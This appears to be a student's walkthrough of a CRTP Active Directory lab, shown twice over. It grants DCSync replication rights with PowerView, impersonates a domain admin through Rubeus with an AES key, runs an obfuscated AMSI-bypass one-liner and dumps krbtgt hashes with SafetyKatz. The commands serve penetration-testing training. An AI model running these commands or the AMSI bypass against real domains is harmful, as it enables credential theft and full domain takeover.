CRTP Lab 12

Task 1:

Check if studentx has Replication (DCSync) rights

If a user doesn't have Replication rights, we can use PowerView to add the current user to the ACL allowing replication rights.

Check if user has replication rights

# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load Powerview
. C:\AD\Tools\PowerView.ps1

# check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student372"}

Start a process as DA and add rights

#Start a process as DA 
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt


# Add rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student372 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Reboot and check rights again:

# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load Powerview
. C:\AD\Tools\PowerView.ps1

# check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student372"}

If you receive an output with the ACLs, then it user has been granted the right.

Task 2

Execute the DCSync attack to pull hashes of the krbtgt user.

Run SafetyKatz to abuse this replication right using DCSync.

Open elevated cmd and run SafetyKatz and dump KRBTGT hashes.

C:\Users\student372>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


PS C:\Users\student372> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

PreviousRights Abuse NextSecurity Descriptors

Last updated 11 months ago

Task 1:

Check if studentx has Replication (DCSync) rights

If a user doesn't have Replication rights, we can use PowerView to add the current user to the ACL allowing replication rights.

Check if user has replication rights

# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load Powerview
. C:\AD\Tools\PowerView.ps1

# check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student372"}

Start a process as DA and add rights

#Start a process as DA 
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt


# Add rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student372 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Reboot and check rights again:

# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load Powerview
. C:\AD\Tools\PowerView.ps1

# check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student372"}

If you receive an output with the ACLs, then it user has been granted the right.

Task 2

Execute the DCSync attack to pull hashes of the krbtgt user.

Run SafetyKatz to abuse this replication right using DCSync.

Open elevated cmd and run SafetyKatz and dump KRBTGT hashes.

C:\Users\student372>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


PS C:\Users\student372> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"